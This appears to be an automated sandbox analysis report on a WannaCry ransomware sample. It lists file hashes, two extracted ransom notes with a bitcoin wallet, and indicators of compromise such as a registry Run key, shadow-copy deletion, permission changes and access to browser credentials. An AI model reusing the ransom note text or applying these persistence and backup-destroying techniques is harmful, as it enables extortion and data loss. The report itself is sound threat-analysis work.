wannacry | 88245085f618f12f441c95c7924fcb57409691942e8dbda1490a7d8c1720c24d

Resubmissions

19/03/2025, 12:07

250319-pap33awwdv 10

19/03/2025, 12:04

250319-n8zvgsznv5 10

Analysis

max time kernel
430s
max time network
431s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
19/03/2025, 12:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DoNothing.exe
Size

4KB
MD5

06de0e898a82060eb95ac87fb8b52061
SHA1

d1232795cebb38209e0b58d05a0b3864439398c5
SHA256

56f452c753174e8a2048f851625c4de3e67c17cb5fbd3a753f7b0cac7932064f
SHA512

091b60a2994791fd76985276e6d4272e138c1d9019b6caa37cab5850cfdd2916d62c98619b86f025cbebfff5b82a3a2d889cc1e6de1300c6d76e823e800f1bb0

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Extracted

Path

C:\Users\Admin\Downloads\r.wnry

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send %s to this bitcoin address: %s Next, please find an application file named "%s". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Downloads MZ/PE file 2 IoCs

flow	pid	Process
1550	1032	msedge.exe
535	1032	msedge.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD50D7.tmp	WannaCrypt0r.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD50EE.tmp	WannaCrypt0r.exe

Executes dropped EXE 27 IoCs

pid	Process
6112	WannaCrypt0r.exe
3972	taskdl.exe
5616	@[email protected]
5512	@[email protected]
5028	taskhsvc.exe
6000	WannaCrypt0r.exe
5012	WannaCrypt0r.exe
1240	WannaCrypt0r.exe
3576	WannaCrypt0r.exe
1220	WannaCrypt0r.exe
408	taskdl.exe
5268	taskse.exe
2156	@[email protected]
1920	taskdl.exe
2032	taskse.exe
2496	@[email protected]
6008	taskse.exe
4576	@[email protected]
5692	taskdl.exe
3596	taskse.exe
6092	@[email protected]
3116	taskdl.exe
7424	@[email protected]
7416	taskse.exe
7476	taskdl.exe
1800	rkill.exe
6616	rkill64.exe

Loads dropped DLL 9 IoCs

pid	Process
4000	msedge.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4828	icacls.exe
4484	icacls.exe
5640	icacls.exe
6004	icacls.exe
5804	icacls.exe
3420	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\gomakdnjvd619 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
533	raw.githubusercontent.com
534	raw.githubusercontent.com
535	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCrypt0r.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_106730339\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-nn.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-de-1996.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-it.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-ec\ru\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-mobile-hub\it\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\Mini-Wallet\miniwallet.bundle.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-bn.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-es.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-notification\ko\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\vendor.bundle.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txt	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\wallet_checkout_autofill_driver.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1002973913\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-mul-ethi.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\app-setup.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-shared-components\zh-Hant\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\wallet-icon.svg	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_997628570\LICENSE	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-sv.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_2127727134\Part-RU	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-notification\ar\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-notification-shared\it\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\wallet\wallet-notification-config.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_2127727134\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-mobile-hub\en-GB\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_2127727134\Part-ES	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-ec\de\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\Tokenized-Card\tokenized-card.bundle.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_2003740088\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-ta.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-shared-components\pt-PT\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-tokenized-card\zh-Hans\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_106730339\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-sq.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-ec\ar\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-hub\th\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-tokenized-card\fr\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\Tokenized-Card\tokenized-card.html	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\buynow_driver.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-hub\zh-Hans\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-notification\fr\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-tokenized-card\de\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\Wallet-BuyNow\wallet-buynow.html	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1002973913\typosquatting_list.pb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_2127727134\Filtering Rules-AA	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_817741329\edge_checkout_page_validator.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-notification-shared\el\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-notification-shared\pt-BR\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-shared-components\ru\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-tokenized-card\ja\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-cy.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-fr.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-ka.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-shared-components\id\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\wallet\wallet-checkout\merchant-site-info.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-hub\it\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-shared-components\ar\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-shared-components\hu\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\Notification\notification_fast.bundle.js.LICENSE.txt	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\webui-setup.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-cs.hyb	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_1286686704\json\i18n-mobile-hub\zh-Hans\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4000_656668715\hyph-tk.hyb	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DoNothing.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133868596919892993"	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-780313508-644878201-565826771-1000\{1772DE9D-3970-4388-BEA0-3E930A996153}	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5812	reg.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
5852	msedge.exe
5852	msedge.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
2884	WMIC.exe
2884	WMIC.exe
2884	WMIC.exe
2884	WMIC.exe
6616	rkill64.exe
6616	rkill64.exe
6616	rkill64.exe
6616	rkill64.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2156	@[email protected]

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

description	pid	Process
Token: 33	712	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	712	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	2884	WMIC.exe
Token: SeSecurityPrivilege	2884	WMIC.exe
Token: SeTakeOwnershipPrivilege	2884	WMIC.exe
Token: SeLoadDriverPrivilege	2884	WMIC.exe
Token: SeSystemProfilePrivilege	2884	WMIC.exe
Token: SeSystemtimePrivilege	2884	WMIC.exe
Token: SeProfSingleProcessPrivilege	2884	WMIC.exe
Token: SeIncBasePriorityPrivilege	2884	WMIC.exe
Token: SeCreatePagefilePrivilege	2884	WMIC.exe
Token: SeBackupPrivilege	2884	WMIC.exe
Token: SeRestorePrivilege	2884	WMIC.exe
Token: SeShutdownPrivilege	2884	WMIC.exe
Token: SeDebugPrivilege	2884	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2884	WMIC.exe
Token: SeRemoteShutdownPrivilege	2884	WMIC.exe
Token: SeUndockPrivilege	2884	WMIC.exe
Token: SeManageVolumePrivilege	2884	WMIC.exe
Token: 33	2884	WMIC.exe
Token: 34	2884	WMIC.exe
Token: 35	2884	WMIC.exe
Token: 36	2884	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2884	WMIC.exe
Token: SeSecurityPrivilege	2884	WMIC.exe
Token: SeTakeOwnershipPrivilege	2884	WMIC.exe
Token: SeLoadDriverPrivilege	2884	WMIC.exe
Token: SeSystemProfilePrivilege	2884	WMIC.exe
Token: SeSystemtimePrivilege	2884	WMIC.exe
Token: SeProfSingleProcessPrivilege	2884	WMIC.exe
Token: SeIncBasePriorityPrivilege	2884	WMIC.exe
Token: SeCreatePagefilePrivilege	2884	WMIC.exe
Token: SeBackupPrivilege	2884	WMIC.exe
Token: SeRestorePrivilege	2884	WMIC.exe
Token: SeShutdownPrivilege	2884	WMIC.exe
Token: SeDebugPrivilege	2884	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2884	WMIC.exe
Token: SeRemoteShutdownPrivilege	2884	WMIC.exe
Token: SeUndockPrivilege	2884	WMIC.exe
Token: SeManageVolumePrivilege	2884	WMIC.exe
Token: 33	2884	WMIC.exe
Token: 34	2884	WMIC.exe
Token: 35	2884	WMIC.exe
Token: 36	2884	WMIC.exe
Token: SeBackupPrivilege	4516	vssvc.exe
Token: SeRestorePrivilege	4516	vssvc.exe
Token: SeAuditPrivilege	4516	vssvc.exe
Token: SeTcbPrivilege	5268	taskse.exe
Token: SeTcbPrivilege	5268	taskse.exe
Token: SeTcbPrivilege	2032	taskse.exe
Token: SeTcbPrivilege	2032	taskse.exe
Token: SeTcbPrivilege	6008	taskse.exe
Token: SeTcbPrivilege	6008	taskse.exe
Token: SeTcbPrivilege	3596	taskse.exe
Token: SeTcbPrivilege	3596	taskse.exe
Token: SeTcbPrivilege	7416	taskse.exe
Token: SeTcbPrivilege	7416	taskse.exe
Token: SeDebugPrivilege	1800	rkill.exe
Token: SeDebugPrivilege	6616	rkill64.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe
4000	msedge.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
5616	@[email protected]
5616	@[email protected]
5512	@[email protected]
5512	@[email protected]
2156	@[email protected]
2156	@[email protected]
2496	@[email protected]
4576	@[email protected]
6092	@[email protected]
7424	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4000 wrote to memory of 1120	4000	msedge.exe	83
PID 4000 wrote to memory of 1120	4000	msedge.exe	83
PID 4000 wrote to memory of 1032	4000	msedge.exe	84
PID 4000 wrote to memory of 1032	4000	msedge.exe	84
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 736	4000	msedge.exe	85
PID 4000 wrote to memory of 3240	4000	msedge.exe	86
PID 4000 wrote to memory of 3240	4000	msedge.exe	86
PID 4000 wrote to memory of 3240	4000	msedge.exe	86
PID 4000 wrote to memory of 3240	4000	msedge.exe	86
PID 4000 wrote to memory of 3240	4000	msedge.exe	86
PID 4000 wrote to memory of 3240	4000	msedge.exe	86
PID 4000 wrote to memory of 3240	4000	msedge.exe	86
PID 4000 wrote to memory of 3240	4000	msedge.exe	86
PID 4000 wrote to memory of 3240	4000	msedge.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 7 IoCs

defense_evasion

Hidden Files and Directories

T1564.001
